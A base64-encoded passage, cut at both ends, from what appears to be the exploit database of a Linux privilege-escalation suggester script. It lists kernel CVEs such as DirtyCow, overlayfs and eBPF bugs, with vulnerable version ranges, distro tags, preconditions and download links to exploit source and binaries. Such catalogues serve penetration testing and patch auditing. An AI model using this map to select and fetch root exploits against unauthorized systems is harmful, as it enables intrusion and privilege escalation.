ZSBpbiBwaW5nX2luaXRfc29jaygpICR7YmxkYmx1fShEb1MpJHt0eHRyc3R9ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8PTMuMTQKVGFnczogClJhbms6IDAKYW5hbHlzaXMtdXJsOiBodHRwczovL2N5c2VjbGFicy5jb20vcGFnZT9uPTAyMDEyMDE2CmV4cGxvaXQtZGI6IDMyOTI2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtNDAxNF0ke3R4dHJzdH0gaW5vZGVfY2FwYWJsZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjEsdmVyPD0zLjEzClRhZ3M6IHVidW50dT0xMi4wNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTQvMDYvMTAvNApleHBsb2l0LWRiOiAzMzgyNApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTQ2OTldJHt0eHRyc3R9IHB0cmFjZS9zeXNyZXQKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuMC4xLHZlcjw9My44ClRhZ3M6IHVidW50dT0xMi4wNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTQvMDcvMDgvMTYKZXhwbG9pdC1kYjogMzQxMzQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC00OTQzXSR7dHh0cnN0fSBQUFBvTDJUUCAke2JsZGJsdX0oRG9TKSR7dHh0cnN0fQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9My4xNS42ClRhZ3M6IApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9jeXNlY2xhYnMuY29tL3BhZ2U/bj0wMTEwMjAxNQpleHBsb2l0LWRiOiAzNjI2NwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTUyMDddJHt0eHRyc3R9IGZ1c2Vfc3VpZApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjEsdmVyPD0zLjE2LjEKVGFnczogClJhbms6IDEKZXhwbG9pdC1kYjogMzQ5MjMKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS05MzIyXSR7dHh0cnN0fSBCYWRJUkVUClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8My4xNy41LHg4Nl82NApUYWdzOiBSSEVMPD03LGZlZG9yYT0yMApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2xhYnMuYnJvbWl1bS5jb20vMjAxNS8wMi8wMi9leHBsb2l0aW5nLWJhZGlyZXQtdnVsbmVyYWJpbGl0eS1jdmUtMjAxNC05MzIyLWxpbnV4LWtlcm5lbC1wcml2aWxlZ2UtZXNjYWxhdGlvbi8Kc3JjLXVybDogaHR0cDovL3NpdGUucGkzLmNvbS5wbC9leHAvcF9jdmUtMjAxNC05MzIyLnRhci5negpleHBsb2l0LWRiOgphdXRob3I6IFJhZmFsICduM3JnYWwnIFdvanRjenVrICYgQWRhbSAncGkzJyBaYWJyb2NraQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTMyOTBdJHt0eHRyc3R9IGVzcGZpeDY0X05NSQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4xMyx2ZXI8NC4xLjYseDg2XzY0ClRhZ3M6IApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDgvMDQvOApleHBsb2l0LWRiOiAzNzcyMgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W04vQV0ke3R4dHJzdH0gYmx1ZXRvb3RoClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPD0yLjYuMTEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA0NzU2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtMTMyOF0ke3R4dHJzdH0gb3ZlcmxheWZzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjEzLjAsdmVyPD0zLjE5LjAKVGFnczogdWJ1bnR1PSgxMi4wNHwxNC4wNCl7a2VybmVsOjMuMTMuMC0oMnwzfDR8NSkqLWdlbmVyaWN9LHVidW50dT0oMTQuMTB8MTUuMDQpe2tlcm5lbDozLigxM3wxNikuMC0qLWdlbmVyaWN9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vc2VjbGlzdHMub3JnL29zcy1zZWMvMjAxNS9xMi83MTcKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvb2ZzXzMyCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL29mc182NApleHBsb2l0LWRiOiAzNzI5MgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTg2NjBdJHt0eHRyc3R9IG92ZXJsYXlmcyAob3ZsX3NldGF0dHIpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMCx2ZXI8PTQuMy4zClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3LmhhbGZkb2cubmV0L1NlY3VyaXR5LzIwMTUvVXNlck5hbWVzcGFjZU92ZXJsYXlmc1NldHVpZFdyaXRlRXhlYy8KZXhwbG9pdC1kYjogMzkyMzAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS04NjYwXSR7dHh0cnN0fSBvdmVybGF5ZnMgKG92bF9zZXRhdHRyKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjAsdmVyPD00LjMuMwpUYWdzOiB1YnVudHU9KDE0LjA0fDE1LjEwKXtrZXJuZWw6NC4yLjAtKDE4fDE5fDIwfDIxfDIyKS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5oYWxmZG9nLm5ldC9TZWN1cml0eS8yMDE1L1VzZXJOYW1lc3BhY2VPdmVybGF5ZnNTZXR1aWRXcml0ZUV4ZWMvCmV4cGxvaXQtZGI6IDM5MTY2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtMDcyOF0ke3R4dHJzdH0ga2V5cmluZwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4xMCx2ZXI8NC40LjEKVGFnczoKUmFuazogMAphbmFseXNpcy11cmw6IGh0dHA6Ly9wZXJjZXB0aW9uLXBvaW50LmlvLzIwMTYvMDEvMTQvYW5hbHlzaXMtYW5kLWV4cGxvaXRhdGlvbi1vZi1hLWxpbnV4LWtlcm5lbC12dWxuZXJhYmlsaXR5LWN2ZS0yMDE2LTA3MjgvCmV4cGxvaXQtZGI6IDQwMDAzCkNvbW1lbnRzOiBFeHBsb2l0IHRha2VzIGFib3V0IH4zMCBtaW51dGVzIHRvIHJ1bi4gRXhwbG9pdCBpcyBub3QgcmVsaWFibGUsIHNlZTogaHR0cHM6Ly9jeXNlY2xhYnMuY29tL2Jsb2cvY3ZlLTIwMTYtMDcyOC1wb2Mtbm90LXdvcmtpbmcKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi0yMzg0XSR7dHh0cnN0fSB1c2ItbWlkaQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjAsdmVyPD00LjQuOApUYWdzOiB1YnVudHU9MTQuMDQsZmVkb3JhPTIyClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3hhaXJ5LmdpdGh1Yi5pby9ibG9nLzIwMTYvY3ZlLTIwMTYtMjM4NApzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNi0yMzg0L3BvYy5jCmV4cGxvaXQtZGI6IDQxOTk5CkNvbW1lbnRzOiBSZXF1aXJlcyBhYmlsaXR5IHRvIHBsdWcgaW4gYSBtYWxpY2lvdXMgVVNCIGRldmljZSBhbmQgdG8gZXhlY3V0ZSBhIG1hbGljaW91cyBiaW5hcnkgYXMgYSBub24tcHJpdmlsZWdlZCB1c2VyCmF1dGhvcjogQW5kcmV5ICd4YWlyeScgS29ub3ZhbG92CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtNDk5N10ke3R4dHJzdH0gdGFyZ2V0X29mZnNldApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49NC40LjAsdmVyPD00LjQuMCxjbWQ6Z3JlcCAtcWkgaXBfdGFibGVzIC9wcm9jL21vZHVsZXMKVGFnczogdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMS1nZW5lcmljfQpSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9vZmZlbnNpdmUtc2VjdXJpdHkvZXhwbG9pdC1kYXRhYmFzZS1iaW4tc3Bsb2l0cy9yYXcvbWFzdGVyL2Jpbi1zcGxvaXRzLzQwMDUzLnppcApDb21tZW50czogaXBfdGFibGVzLmtvIG5lZWRzIHRvIGJlIGxvYWRlZApleHBsb2l0LWRiOiA0MDA0OQphdXRob3I6IFZpdGFseSAndm5paycgTmlrb2xlbmtvCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtNDU1N10ke3R4dHJzdH0gZG91YmxlLWZkcHV0KCkKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8NC41LjUsQ09ORklHX0JQRl9TWVNDQUxMPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkIT0xClRhZ3M6IHVidW50dT0xNi4wNHtrZXJuZWw6NC40LjAtMjEtZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vYnVncy5jaHJvbWl1bS5vcmcvcC9wcm9qZWN0LXplcm8vaXNzdWVzL2RldGFpbD9pZD04MDgKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0LWRhdGFiYXNlLWJpbi1zcGxvaXRzL3Jhdy9tYXN0ZXIvYmluLXNwbG9pdHMvMzk3NzIuemlwCkNvbW1lbnRzOiBDT05GSUdfQlBGX1NZU0NBTEwgbmVlZHMgdG8gYmUgc2V0ICYmIGtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkICE9IDEKZXhwbG9pdC1kYjogNDA3NTkKYXV0aG9yOiBKYW5uIEhvcm4KRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi01MTk1XSR7dHh0cnN0fSBkaXJ0eWNvdwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjIyLHZlcjw9NC44LjMKVGFnczogZGViaWFuPTd8OCxSSEVMPTV7a2VybmVsOjIuNi4oMTh8MjR8MzMpLSp9LFJIRUw9NntrZXJuZWw6Mi42LjMyLSp8My4oMHwyfDZ8OHwxMCkuKnwyLjYuMzMuOS1ydDMxfSxSSEVMPTd7a2VybmVsOjMuMTAuMC0qfDQuMi4wLTAuMjEuZWw3fSx1YnVudHU9MTYuMDR8MTQuMDR8MTIuMDQKUmFuazogNAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9kaXJ0eWNvdy9kaXJ0eWNvdy5naXRodWIuaW8vd2lraS9WdWxuZXJhYmlsaXR5RGV0YWlscwpDb21tZW50czogRm9yIFJIRUwvQ2VudE9TIHNlZSBleGFjdCB2dWxuZXJhYmxlIHZlcnNpb25zIGhlcmU6IGh0dHBzOi8vYWNjZXNzLnJlZGhhdC5jb20vc2l0ZXMvZGVmYXVsdC9maWxlcy9yaC1jdmUtMjAxNi01MTk1XzUuc2gKZXhwbG9pdC1kYjogNDA2MTEKYXV0aG9yOiBQaGlsIE9lc3RlcgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTUxOTVdJHt0eHRyc3R9IGRpcnR5Y293IDIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4yMix2ZXI8PTQuOC4zClRhZ3M6IGRlYmlhbj03fDgsUkhFTD01fDZ8Nyx1YnVudHU9MTQuMDR8MTIuMDQsdWJ1bnR1PTEwLjA0e2tlcm5lbDoyLjYuMzItMjEtZ2VuZXJpY30sdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMS1nZW5lcmljfQpSYW5rOiA0CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL2RpcnR5Y293L2RpcnR5Y293LmdpdGh1Yi5pby93aWtpL1Z1bG5lcmFiaWxpdHlEZXRhaWxzCmV4dC11cmw6IGh0dHBzOi8vd3d3LmV4cGxvaXQtZGIuY29tL2Rvd25sb2FkLzQwODQ3CkNvbW1lbnRzOiBGb3IgUkhFTC9DZW50T1Mgc2VlIGV4YWN0IHZ1bG5lcmFibGUgdmVyc2lvbnMgaGVyZTogaHR0cHM6Ly9hY2Nlc3MucmVkaGF0LmNvbS9zaXRlcy9kZWZhdWx0L2ZpbGVzL3JoLWN2ZS0yMDE2LTUxOTVfNS5zaApleHBsb2l0LWRiOiA0MDgzOQphdXRob3I6IEZpcmVGYXJ0IChhdXRob3Igb2YgZXhwbG9pdCBhdCBFREIgNDA4MzkpOyBHYWJyaWVsZSBCb25hY2luaSAoYXV0aG9yIG9mIGV4cGxvaXQgYXQgJ2V4dC11cmwnKQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTg2NTVdJHt0eHRyc3R9IGNob2NvYm9fcm9vdApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49NC40LjAsdmVyPDQuOSxDT05GSUdfVVNFUl9OUz15LHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX3VzZXJuc19jbG9uZT09MQpUYWdzOiB1YnVudHU9KDE0LjA0fDE2LjA0KXtrZXJuZWw6NC40LjAtKDIxfDIyfDI0fDI4fDMxfDM0fDM2fDM4fDQyfDQzfDQ1fDQ3fDUxKS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTYvMTIvMDYvMQpDb21tZW50czogQ0FQX05FVF9SQVcgY2FwYWJpbGl0eSBpcyBuZWVkZWQgT1IgQ09ORklHX1VTRVJfTlM9eSBuZWVkcyB0byBiZSBlbmFibGVkCmJpbi11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yYXBpZDcvbWV0YXNwbG9pdC1mcmFtZXdvcmsvbWFzdGVyL2RhdGEvZXhwbG9pdHMvQ1ZFLTIwMTYtODY1NS9jaG9jb2JvX3Jvb3QKZXhwbG9pdC1kYjogNDA4NzEKYXV0aG9yOiByZWJlbApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTk3OTNdJHt0eHRyc3R9IFNPX3tTTkR8UkNWfUJVRkZPUkNFClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjExLHZlcjw0LjguMTQsQ09ORklHX1VTRVJfTlM9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9PTEKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS94YWlyeS9rZXJuZWwtZXhwbG9pdHMvdHJlZS9tYXN0ZXIvQ1ZFLTIwMTYtOTc5MwpzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNi05NzkzL3BvYy5jCkNvbW1lbnRzOiBDQVBfTkVUX0FETUlOIGNhcHMgT1IgQ09ORklHX1VTRVJfTlM9eSBuZWVkZWQuIE5vIFNNRVAvU01BUC9LQVNMUiBieXBhc3MgaW5jbHVkZWQuIFRlc3RlZCBpbiBRRU1VIG9ubHkKZXhwbG9pdC1kYjogNDE5OTUKYXV0aG9yOiBBbmRyZXkgJ3hhaXJ5JyBLb25vdmFsb3YKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy02MDc0XSR7dHh0cnN0fSBkY2NwClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTgsdmVyPD00LjkuMTEsQ09ORklHX0lQX0RDQ1A9W215XQpUYWdzOiB1YnVudHU9KDE0LjA0fDE2LjA0KXtrZXJuZWw6NC40LjAtNjItZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAyLzIyLzMKQ29tbWVudHM6IFJlcXVpcmVzIEtlcm5lbCBiZSBidWlsdCB3aXRoIENPTkZJR19JUF9EQ0NQIGVuYWJsZWQuIEluY2x1ZGVzIHBhcnRpYWwgU01FUC9TTUFQIGJ5cGFzcwpleHBsb2l0LWRiOiA0MTQ1OAphdXRob3I6IEFuZHJleSAneGFpcnknIEtvbm92YWxvdgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE3LTczMDhdJHt0eHRyc3R9IGFmX3BhY2tldApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9NC4xMC42LENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xClRhZ3M6IHVidW50dT0xNi4wNHtrZXJuZWw6NC44LjAtKDM0fDM2fDM5fDQxfDQyfDQ0fDQ1KS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9nb29nbGVwcm9qZWN0emVyby5ibG9nc3BvdC5jb20vMjAxNy8wNS9leHBsb2l0aW5nLWxpbnV4LWtlcm5lbC12aWEtcGFja2V0Lmh0bWwKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3hhaXJ5L2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTctNzMwOC9wb2MuYwpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTctNzMwOC9wb2MuYwpDb21tZW50czogQ0FQX05FVF9SQVcgY2FwIG9yIENPTkZJR19VU0VSX05TPXkgbmVlZGVkLiBNb2RpZmllZCB2ZXJzaW9uIGF0ICdleHQtdXJsJyBhZGRzIHN1cHBvcnQgZm9yIGFkZGl0aW9uYWwga2VybmVscwpiaW4tdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmFwaWQ3L21ldGFzcGxvaXQtZnJhbWV3b3JrL21hc3Rlci9kYXRhL2V4cGxvaXRzL2N2ZS0yMDE3LTczMDgvZXhwbG9pdApleHBsb2l0LWRiOiA0MTk5NAphdXRob3I6IEFuZHJleSAneGFpcnknIEtvbm92YWxvdiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IEJyZW5kYW4gQ29sZXMgKGF1dGhvciBvZiBleHBsb2l0IHVwZGF0ZSBhdCAnZXh0LXVybCcpCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTY5OTVdJHt0eHRyc3R9IGVCUEZfdmVyaWZpZXIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8PTQuMTQuOCxDT05GSUdfQlBGX1NZU0NBTEw9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF9icGZfZGlzYWJsZWQhPTEKVGFnczogZGViaWFuPTkuMHtrZXJuZWw6NC45LjAtMy1hbWQ2NH0sZmVkb3JhPTI1fDI2fDI3LHVidW50dT0xNC4wNHtrZXJuZWw6NC40LjAtODktZ2VuZXJpY30sdWJ1bnR1PSgxNi4wNHwxNy4wNCl7a2VybmVsOjQuKDh8MTApLjAtKDE5fDI4fDQ1KS1nZW5lcmljfQpSYW5rOiA1CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9yaWNrbGFyYWJlZS5ibG9nc3BvdC5jb20vMjAxOC8wNy9lYnBmLWFuZC1hbmFseXNpcy1vZi1nZXQtcmVrdC1saW51eC5odG1sCkNvbW1lbnRzOiBDT05GSUdfQlBGX1NZU0NBTEwgbmVlZHMgdG8gYmUgc2V0ICYmIGtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkICE9IDEKYmluLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3JhcGlkNy9tZXRhc3Bsb2l0LWZyYW1ld29yay9tYXN0ZXIvZGF0YS9leHBsb2l0cy9jdmUtMjAxNy0xNjk5NS9leHBsb2l0Lm91dApleHBsb2l0LWRiOiA0NTAxMAphdXRob3I6IFJpY2sgTGFyYWJlZQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE3LTEwMDAxMTJdJHt0eHRyc3R9IE5FVElGX0ZfVUZPClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj00LjQsdmVyPD00LjEzLENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xClRhZ3M6IHVidW50dT0xNC4wNHtrZXJuZWw6NC40LjAtKn0sdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjguMC0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTcvMDgvMTMvMQpzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy0xMDAwMTEyL3BvYy5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy0xMDAwMTEyL3BvYy5jCkNvbW1lbnRzOiBDQVBfTkVUX0FETUlOIGNhcCBvciBDT05GSUdfVVNFUl9OUz15IG5lZWRlZC4gU01FUC9LQVNMUiBieXBhc3MgaW5jbHVkZWQuIE1vZGlmaWVkIHZlcnNpb24gYXQgJ2V4dC11cmwnIGFkZHMgc3VwcG9ydCBmb3IgYWRkaXRpb25hbCBkaXN0cm9zL2tlcm5lbHMKYmluLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3JhcGlkNy9tZXRhc3Bsb2l0LWZyYW1ld29yay9tYXN0ZXIvZGF0YS9leHBsb2l0cy9jdmUtMjAxNy0xMDAwMTEyL2V4cGxvaXQub3V0CmV4cGxvaXQtZGI6CmF1dGhvcjogQW5kcmV5ICd4YWlyeScgS29ub3ZhbG92IChvcmdpbmFsIGV4cGxvaXQgYXV0aG9yKTsgQnJlbmRhbiBDb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMjUzXSR7dHh0cnN0fSBQSUVfc3RhY2tfY29ycnVwdGlvbgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9NC4xMyx4ODZfNjQKVGFnczogUkhFTD02LFJIRUw9N3trZXJuZWw6My4xMC4wLTUxNC4yMS4yfDMuMTAuMC01MTQuMjYuMX0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wOS8yNi9saW51eC1waWUtY3ZlLTIwMTctMTAwMDI1My9jdmUtMjAxNy0xMDAwMjUzLnR4dApzcmMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTcvMDkvMjYvbGludXgtcGllLWN2ZS0yMDE3LTEwMDAyNTMvY3ZlLTIwMTctMTAwMDI1My5jCmV4cGxvaXQtZGI6IDQyODg3CmF1dGhvcjogUXVhbHlzCkNvbW1lbnRzOgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE4LTUzMzNdJHt0eHRyc3R9IHJkc19hdG9taWNfZnJlZV9vcCBOVUxMIHBvaW50ZXIgZGVyZWZlcmVuY2UKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8PTQuMTQuMTMsY21kOmdyZXAgLXFpIHJkcyAvcHJvYy9tb2R1bGVzLHg4Nl82NApUYWdzOiB1YnVudHU9MTYuMDR7a2VybmVsOjQuNC4wfDQuOC4wfQpSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2lzdC5naXRodWJ1c2VyY29udGVudC5jb20vd2Jvd2xpbmcvOWQzMjQ5MmJkOTZkOWU3YzNiZjUyZTIzYTBhYzMwYTQvcmF3Lzk1OTMyNTgxOWM3ODI0OGE2NDM3MTAyYmIyODliYjg1NzhhMTM1Y2QvY3ZlLTIwMTgtNTMzMy1wb2MuYwpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTgtNTMzMy9jdmUtMjAxOC01MzMzLmMKQ29tbWVudHM6IHJkcy5rbyBrZXJuZWwgbW9kdWxlIG5lZWRzIHRvIGJlIGxvYWRlZC4gTW9kaWZpZWQgdmVyc2lvbiBhdCAnZXh0LXVybCcgYWRkcyBzdXBwb3J0IGZvciBhZGRpdGlvbmFsIHRhcmdldHMgYW5kIGJ5cGFzc2luZyBLQVNMUi4KYXV0aG9yOiB3Ym93bGluZyAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xODk1NV0ke3R4dHJzdH0gc3VidWlkX3NoZWxsClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj00LjE1LHZlcjw9NC4xOS4yLENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xLGNtZDpbIC11IC91c3IvYmluL25ld3VpZG1hcCBdLGNtZDpbIC11IC91c3IvYmluL25ld2dpZG1hcCBdClRhZ3M6IHVidW50dT0xOC4wNHtrZXJuZWw6NC4xNS4wLTIwLWdlbmVyaWN9LGZlZG9yYT0yOHtrZXJuZWw6NC4xNi4zLTMwMS5mYzI4fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9idWdzLmNocm9taXVtLm9yZy9wL3Byb2plY3QtemVyby9pc3N1ZXMvZGV0YWlsP2lkPTE3MTIKc3J